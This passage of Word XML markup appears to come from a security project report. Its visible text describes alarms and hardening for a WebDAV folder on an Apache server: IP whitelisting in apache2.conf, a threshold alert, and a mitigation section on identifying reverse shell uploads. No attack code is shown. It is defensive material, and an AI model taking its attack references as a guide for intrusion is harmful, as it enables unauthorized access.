                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 339 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 420 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 501 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125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2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4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339" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="420" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501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4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19048" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="423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System Hardening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D9CB31" id="Group 19" o:spid="_x0000_s1100" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 21" o:spid="_x0000_s1101" style="position:absolute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" path="m4234,125l4212,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r214,l420,840r81,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#365b8a" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4212,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;339,751;420,840;501,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 20" o:spid="_x0000_s1102" type="#_x0000_t202" style="position:absolute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4BC19048" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="423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System Hardening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C9AADC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto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62ACAAD6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="889"/>
          <w:tab w:val="left" w:pos="890"/>
        </w:tabs>
        <w:spacing w:line="219" w:lineRule="exact"/>
        <w:ind w:left="890"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Similar idea to the detection of the authorized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1522C9AF" w14:textId="7AC53B5B" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="889" w:right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03840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53115E3F" wp14:editId="22538FED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>269240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>591820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8605520" cy="2744470"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2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5520" cy="2744470"/>
                          <a:chOff x="424" y="932"/>
                          <a:chExt cx="13552" cy="4322"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="26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432" y="5229"/>
                            <a:ext cx="13536" cy="1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" y="1453"/>
                            <a:ext cx="4725" cy="3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4" y="931"/>
                            <a:ext cx="5712" cy="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B6A419" id="Group 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:21.2pt;margin-top:46.6pt;width:677.6pt;height:216.1pt;z-index:-16112640;mso-position-horizontal-relative:page" coordorigin="424,932" coordsize="13552,43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AEeskmeboBAHm6AQAV&#10;AAAAZHJzL21lZGlhL2ltYWdlMi5qcGVn/9j/4AAQSkZJRgABAQEA3ADcAAD/2wBDAAIBAQEBAQIB&#10;AQECAgICAgQDAgICAgUEBAMEBgUGBgYFBgYGBwkIBgcJBwYGCAsICQoKCgoKBggLDAsKDAkKCgr/&#10;2wBDAQICAgICAgUDAwUKBwYHCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoK&#10;CgoKCgoKCgoKCgr/wAARCAJIA2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">
                <v:line id="Line 18" o:spid="_x0000_s1027" style="position:absolute;visibility:visible;mso-wrap-style:square" from="432,5229" to="13968,5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" strokecolor="#a8b6bf"/>
                <v:shape id="Picture 17" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:597;top:1453;width:4725;height:3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">
                  <v:imagedata r:id="rId66" o:title=""/>
                </v:shape>
                <v:shape id="Picture 16" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:7764;top:931;width:5712;height:3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">
                  <v:imagedata r:id="rId67" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve">directory. Create and alert to detect any unauthorized access to the </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>folder other than non-white listed IPs. Set an alarm to be triggered when more than 10 attempts were made to request the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729FEE4D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="249" w:lineRule="exact"/>
        <w:ind w:left="889"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85F4DB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1454"/>
          <w:tab w:val="left" w:pos="1455"/>
        </w:tabs>
        <w:spacing w:line="219" w:lineRule="exact"/>
        <w:ind w:hanging="421"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Limit user access to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WebDAV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>folder in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</w:p>
    <w:p w14:paraId="3A0F838C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="16" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="1454" w:right="1002"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487203328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C59725F" wp14:editId="6E859E65">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4584690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-844810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="118691" cy="3901835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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91" cy="390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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/apache2/apache2.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>under directories by creating whitelist of trusted IP addresses (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="003673CB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="exact"/>
        <w:ind w:left="1454"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>settings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4404F5BB" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="252" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr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num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="5784" w:space="686"/>
            <w:col w:w="7470"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D53EF9D" w14:textId="0EF8299D" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="28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32384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="171A7A83" wp14:editId="5B23FEF0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>500380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="24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95360" cy="101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59595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7DE217" id="Line 14" o:spid="_x0000_s1026" style="position:absolute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1.6pt,39.4pt" to="698.4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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Mitigation: Identifying Reverse Shell Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C1261" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FA03DC" w14:textId="6127B44B" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7493"/>
        </w:tabs>
        <w:ind w:left="440"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pP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6DDAA3C4" wp14:editId="3A5EC7E7">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="6985" r="6985" b="1905"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0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="22" name="Freeform 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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4213 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 294 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 364 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 434 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125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3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4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294" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="364" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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4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5C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E7BDA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="1523" w:right="1525"/>
                                <w:jc w:val="center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Alarm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AA3C4" id="Group 11" o:spid="_x0000_s1103" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 13" o:spid="_x0000_s1104" style="position:absolute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" path="m4234,125l4213,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r169,l364,840r70,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4213,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;294,751;364,840;434,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 12" o:spid="_x0000_s1105" type="#_x0000_t202" style="position:absolute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462E7BDA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="1523" w:right="1525"/>
                          <w:jc w:val="center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Alarm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6B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A6E1330" wp14:editId="55FDFE6C">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="1905" t="6985" r="5080" b="1905"/>
                <wp:docPr id="1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8590" cy="534035"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="16" name="Freeform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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4212 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 339 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 420 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 501 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125 h 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234" h="841">
                                <a:moveTo>
                                  <a:pt x="4234" y="125"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4212" y="56"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4156" y="10"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4108" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="125" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76" y="10"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37" y="37"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10" y="76"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="125"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37" y="714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76" y="741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="125" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="420" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4108" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4157" y="741"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4197" y="714"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4224" y="674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4234" y="626"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4234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5B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234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BD3E9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="423"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t>System Hardening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6E1330" id="Group 8" o:spid="_x0000_s1106" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="4234,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">
                <v:shape id="Freeform 10" o:spid="_x0000_s1107" style="position:absolute;width:4234;height:841;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4234,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" path="m4234,125l4212,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r214,l420,840r81,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#365b8a" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4212,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;339,751;420,840;501,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 9" o:spid="_x0000_s1108" type="#_x0000_t202" style="position:absolute;width:4234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6EFBD3E9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="423"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="42"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="42"/>
                          </w:rPr>
                          <w:t>System Hardening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D72C29F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
        <w:sectPr w:rsidR="00377979">
          <w:pgSz w:w="14400" w:h="8100" w:orient="landscape"/>
          <w:pgMar w:top="220" w:right="180" w:bottom="0" w:left="280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A13456" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
